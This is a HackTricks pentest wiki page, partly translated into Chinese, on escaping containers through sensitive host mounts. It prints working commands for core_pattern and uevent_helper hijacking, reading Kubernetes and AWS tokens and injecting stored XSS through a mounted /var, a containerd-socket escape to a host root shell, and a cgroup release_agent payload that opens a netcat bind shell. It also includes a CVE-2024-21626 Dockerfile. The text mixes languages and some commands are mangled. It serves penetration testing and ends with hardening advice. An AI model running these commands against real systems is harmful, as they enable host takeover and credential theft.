Sensitive Mounts

tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

暴露 /proc/sys/var 而没有适当的命名空间隔离会引入重大安全风险,包括攻击面扩大和信息泄露。这些目录包含敏感文件,如果配置错误或被未经授权的用户访问,可能导致容器逃逸、主机修改,或提供有助于进一步攻击的信息。例如,错误地挂载 -v /proc:/host/proc 可能会由于其基于路径的特性绕过 AppArmor 保护,使得 /host/proc 没有保护。

您可以在 https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts** 中找到每个潜在漏洞的更多详细信息。**

procfs Vulnerabilities

/proc/sys

该目录允许访问以修改内核变量,通常通过 sysctl(2),并包含几个值得关注的子目录:

/proc/sys/kernel/core_pattern

  • core(5) 中描述。

  • 如果您可以写入此文件,则可以写入一个管道 |,后跟将在崩溃发生后执行的程序或脚本的路径。

  • 攻击者可以通过执行 mount 找到主机中其容器的路径,并将路径写入其容器文件系统中的二进制文件。然后,崩溃一个程序以使内核在容器外执行该二进制文件。

  • 测试和利用示例

bash
[ -w /proc/sys/kernel/core_pattern ] && echo Yes # Test write access
cd /proc/sys/kernel
echo "|$overlay/shell.sh" > core_pattern # Set custom handler
sleep 5 && ./crash & # Trigger handler

检查 this post 以获取更多信息。

示例程序崩溃:

c
int main(void) {
char buf[1];
for (int i = 0; i < 100; i++) {
buf[i] = 1;
}
return 0;
}

/proc/sys/kernel/modprobe

  • proc(5) 中详细说明。
  • 包含用于加载内核模块的内核模块加载器的路径。
  • 检查访问示例
bash
ls -l $(cat /proc/sys/kernel/modprobe) # 检查对 modprobe 的访问

/proc/sys/vm/panic_on_oom

  • proc(5) 中引用。
  • 一个全局标志,控制内核在发生 OOM 条件时是否崩溃或调用 OOM 杀手。

/proc/sys/fs

  • 根据 proc(5),包含有关文件系统的选项和信息。
  • 写入访问可能会对主机启用各种拒绝服务攻击。

/proc/sys/fs/binfmt_misc

  • 允许根据其魔数注册非本地二进制格式的解释器。
  • 如果 /proc/sys/fs/binfmt_misc/register 可写,可能导致特权升级或 root shell 访问。
  • 相关漏洞和解释:
  • Poor man's rootkit via binfmt_misc
  • 深入教程:视频链接

其他 /proc 中的内容

/proc/config.gz

  • 如果启用了 CONFIG_IKCONFIG_PROC,可能会泄露内核配置。
  • 对攻击者识别运行内核中的漏洞非常有用。

/proc/sysrq-trigger

  • 允许调用 Sysrq 命令,可能导致立即重启系统或其他关键操作。
  • 重启主机示例
bash
echo b > /proc/sysrq-trigger # 重启主机

/proc/kmsg

  • 暴露内核环形缓冲区消息。
  • 可以帮助进行内核漏洞利用、地址泄漏,并提供敏感系统信息。

/proc/kallsyms

  • 列出内核导出的符号及其地址。
  • 对于内核漏洞开发至关重要,尤其是在克服 KASLR 时。
  • 地址信息在 kptr_restrict 设置为 12 时受到限制。
  • 详细信息见 proc(5)

/proc/[pid]/mem

  • 与内核内存设备 /dev/mem 交互。
  • 历史上容易受到特权升级攻击。
  • 更多信息见 proc(5)

/proc/kcore

  • 以 ELF core 格式表示系统的物理内存。
  • 读取可能会泄露主机系统和其他容器的内存内容。
  • 大文件大小可能导致读取问题或软件崩溃。
  • 详细用法见 Dumping /proc/kcore in 2019

/proc/kmem

  • /dev/kmem 的替代接口,表示内核虚拟内存。
  • 允许读取和写入,因此可以直接修改内核内存。

/proc/mem

  • /dev/mem 的替代接口,表示物理内存。
  • 允许读取和写入,修改所有内存需要解析虚拟地址到物理地址。

/proc/sched_debug

  • 返回进程调度信息,绕过 PID 命名空间保护。
  • 暴露进程名称、ID 和 cgroup 标识符。

/proc/[pid]/mountinfo

  • 提供有关进程挂载命名空间中挂载点的信息。
  • 暴露容器 rootfs 或映像的位置。

/sys 漏洞

/sys/kernel/uevent_helper

  • 用于处理内核设备 uevents
  • 写入 /sys/kernel/uevent_helper 可以在 uevent 触发时执行任意脚本。
  • 漏洞利用示例
bash

#### Creates a payload

echo "#!/bin/sh" > /evil-helper echo "ps > /output" >> /evil-helper chmod +x /evil-helper

#### Finds host path from OverlayFS mount for container

host*path=$(sed -n 's/.*\perdir=(\[^,]\_).\*/\1/p' /etc/mtab)

#### Sets uevent_helper to malicious helper

echo "$host_path/evil-helper" > /sys/kernel/uevent_helper

#### Triggers a uevent

echo change > /sys/class/mem/null/uevent

#### Reads the output

cat /output

/sys/class/thermal

  • Controls temperature settings, potentially causing DoS attacks or physical damage.

/sys/kernel/vmcoreinfo

  • Leaks kernel addresses, potentially compromising KASLR.

/sys/kernel/security

  • Houses securityfs interface, allowing configuration of Linux Security Modules like AppArmor.
  • Access might enable a container to disable its MAC system.

/sys/firmware/efi/vars and /sys/firmware/efi/efivars

  • Exposes interfaces for interacting with EFI variables in NVRAM.
  • Misconfiguration or exploitation can lead to bricked laptops or unbootable host machines.

/sys/kernel/debug

  • debugfs offers a "no rules" debugging interface to the kernel.
  • History of security issues due to its unrestricted nature.

/var Vulnerabilities

The host's /var folder contains container runtime sockets and the containers' filesystems. If this folder is mounted inside a container, that container will get read-write access to other containers' file systems with root privileges. This can be abused to pivot between containers, to cause a denial of service, or to backdoor other containers and applications that run in them.

Kubernetes

If a container like this is deployed with Kubernetes:

yaml
apiVersion: v1  
kind: Pod  
metadata:  
  name: pod-mounts-var  
  labels:  
    app: pentest  
spec:  
  containers:  
  - name: pod-mounts-var-folder  
    image: alpine  
    volumeMounts:  
    - mountPath: /host-var  
      name: noderoot  
    command: [ "/bin/sh", "-c", "--" ]  
    args: [ "while true; do sleep 30; done;" ]  
  volumes:  
  - name: noderoot  
    hostPath:  
      path: /var

Inside the pod-mounts-var-folder container:

bash
/ # find /host-var/ -type f -iname '*.env*' 2>/dev/null

/host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/201/fs/usr/src/app/.env.example
<SNIP>
/host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/135/fs/docker-entrypoint.d/15-local-resolvers.envsh

/ # cat /host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/105/fs/usr/src/app/.env.example | grep -i secret
JWT_SECRET=85d<SNIP>a0
REFRESH_TOKEN_SECRET=14<SNIP>ea

/ # find /host-var/ -type f -iname 'index.html' 2>/dev/null
/host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/57/fs/usr/src/app/node_modules/@mapbox/node-pre-gyp/lib/util/nw-pre-gyp/index.html
<SNIP>
/host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/140/fs/usr/share/nginx/html/index.html
/host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/132/fs/usr/share/nginx/html/index.html

/ # echo '<!DOCTYPE html><html lang="en"><head><script>alert("Stored XSS!")</script></head></html>' > /host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/140/fs/usr/sh
are/nginx/html/index2.html

The XSS was achieved:

Stored XSS via mounted /var folder

Note that the container DOES NOT require a restart or anything. Any changes made via the mounted /var folder will be applied instantly.

You can also replace configuration files, binaries, services, application files, and shell profiles to achieve automatic (or semi-automatic) RCE.

Access to cloud credentials

The container can read K8s serviceaccount tokens or AWS webidentity tokens which allows the container to gain unauthorized access to K8s or cloud:

bash
/ # find /host-var/ -type f -iname '*token*' 2>/dev/null | grep kubernetes.io
/host-var/lib/kubelet/pods/21411f19-934c-489e-aa2c-4906f278431e/volumes/kubernetes.io~projected/kube-api-access-64jw2/..2025_01_22_12_37_42.4197672587/token
<SNIP>
/host-var/lib/kubelet/pods/01c671a5-aaeb-4e0b-adcd-1cacd2e418ac/volumes/kubernetes.io~projected/kube-api-access-bljdj/..2025_01_22_12_17_53.265458487/token
/host-var/lib/kubelet/pods/01c671a5-aaeb-4e0b-adcd-1cacd2e418ac/volumes/kubernetes.io~projected/aws-iam-token/..2025_01_22_03_45_56.2328221474/token
/host-var/lib/kubelet/pods/5fb6bd26-a6aa-40cc-abf7-ecbf18dde1f6/volumes/kubernetes.io~projected/kube-api-access-fm2t6/..2025_01_22_12_25_25.3018586444/token

Docker

The exploitation in Docker (or in Docker Compose deployments) is exactly the same, except that usually the other containers' filesystems are available under a different base path:

bash
$ docker info | grep -i 'docker root\|storage driver'
存储驱动: overlay2
Docker 根目录: /var/lib/docker

So the filesystems are under /var/lib/docker/overlay2/:

bash
$ sudo ls -la /var/lib/docker/overlay2

drwx--x---  4 root root  4096 1月  9 22:14 00762bca8ea040b1bb28b61baed5704e013ab23a196f5fe4758dafb79dfafd5d
drwx--x---  4 root root  4096 1月 11 17:00 03cdf4db9a6cc9f187cca6e98cd877d581f16b62d073010571e752c305719496
drwx--x---  4 root root  4096 1月  9 21:23 049e02afb3f8dec80cb229719d9484aead269ae05afe81ee5880ccde2426ef4f
drwx--x---  4 root root  4096 1月  9 21:22 062f14e5adbedce75cea699828e22657c8044cd22b68ff1bb152f1a3c8a377f2
<SNIP>

Note

The actual paths may differ in different setups, which is why your best bet is to use the find command to locate the other containers' filesystems and SA / web identity tokens

Other Sensitive Host Sockets and Directories (2023-2025)

Mounting certain host Unix sockets or writable pseudo-filesystems is equivalent to giving the container full root on the node. Treat the following paths as highly sensitive and never expose them to untrusted workloads:

text
/run/containerd/containerd.sock     # containerd CRI 套接字  
/var/run/crio/crio.sock             # CRI-O 运行时套接字  
/run/podman/podman.sock             # Podman API(有根或无根)  
/var/run/kubelet.sock               # Kubernetes 节点上的 Kubelet API  
/run/firecracker-containerd.sock    # Kata / Firecracker

Attack example abusing a mounted containerd socket:

bash
# 在容器内(套接字挂载在 /host/run/containerd.sock)
ctr --address /host/run/containerd.sock images pull docker.io/library/busybox:latest
ctr --address /host/run/containerd.sock run --tty --privileged --mount \
type=bind,src=/,dst=/host,options=rbind:rw docker.io/library/busybox:latest host /bin/sh
chroot /host /bin/bash   # 在主机上获得完整的 root shell

A similar technique works with crictl, podman or the kubelet API once their respective sockets are exposed.

Writable cgroup v1 mounts are also dangerous. If /sys/fs/cgroup is bind-mounted rw and the host kernel is vulnerable to CVE-2022-0492, an attacker can set a malicious release_agent and execute arbitrary code in the initial namespace:

bash
# 假设容器具有 CAP_SYS_ADMIN 权限并且内核存在漏洞
mkdir -p /tmp/x && echo 1 > /tmp/x/notify_on_release

echo '/tmp/pwn' > /sys/fs/cgroup/release_agent   # 需要 CVE-2022-0492

echo -e '#!/bin/sh\nnc -lp 4444 -e /bin/sh' > /tmp/pwn && chmod +x /tmp/pwn
sh -c "echo 0 > /tmp/x/cgroup.procs"  # 触发 empty-cgroup 事件

When the last process leaves the cgroup, /tmp/pwn runs as root on the host. Patched kernels (>5.8 with commit 32a0db39f30d) validate the writer’s capabilities and block this abuse.

  • CVE-2024-21626 – runc “Leaky Vessels” file-descriptor leak runc ≤1.1.11 leaked an open directory file descriptor that could point to the host root. A malicious image or docker exec could start a container whose working directory is already on the host filesystem, enabling arbitrary file read/write and privilege escalation. Fixed in runc 1.1.12 (Docker ≥25.0.3, containerd ≥1.7.14).
Dockerfile
FROM scratch
WORKDIR /proc/self/fd/4   # 4 == "/" on the host leaked by the runtime
CMD ["/bin/sh"]
  • CVE-2024-23651 / 23653 – BuildKit OverlayFS copy-up TOCTOU A race condition in the BuildKit snapshotter let an attacker replace a file that was about to be copy-up into the container’s rootfs with a symlink to an arbitrary path on the host, gaining write access outside the build context. Fixed in BuildKit v0.12.5 / Buildx 0.12.0. Exploitation requires an untrusted docker build on a vulnerable daemon.

Hardening Reminders (2025)

  1. Bind-mount host paths read-only whenever possible and add nosuid,nodev,noexec mount options.
  2. Prefer dedicated side-car proxies or rootless clients instead of exposing the runtime socket directly.
  3. Keep the container runtime up-to-date (runc ≥1.1.12, BuildKit ≥0.12.5, containerd ≥1.7.14).
  4. In Kubernetes, use securityContext.readOnlyRootFilesystem: true, the restricted PodSecurity profile and avoid hostPath volumes pointing to the paths listed above.

References

tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks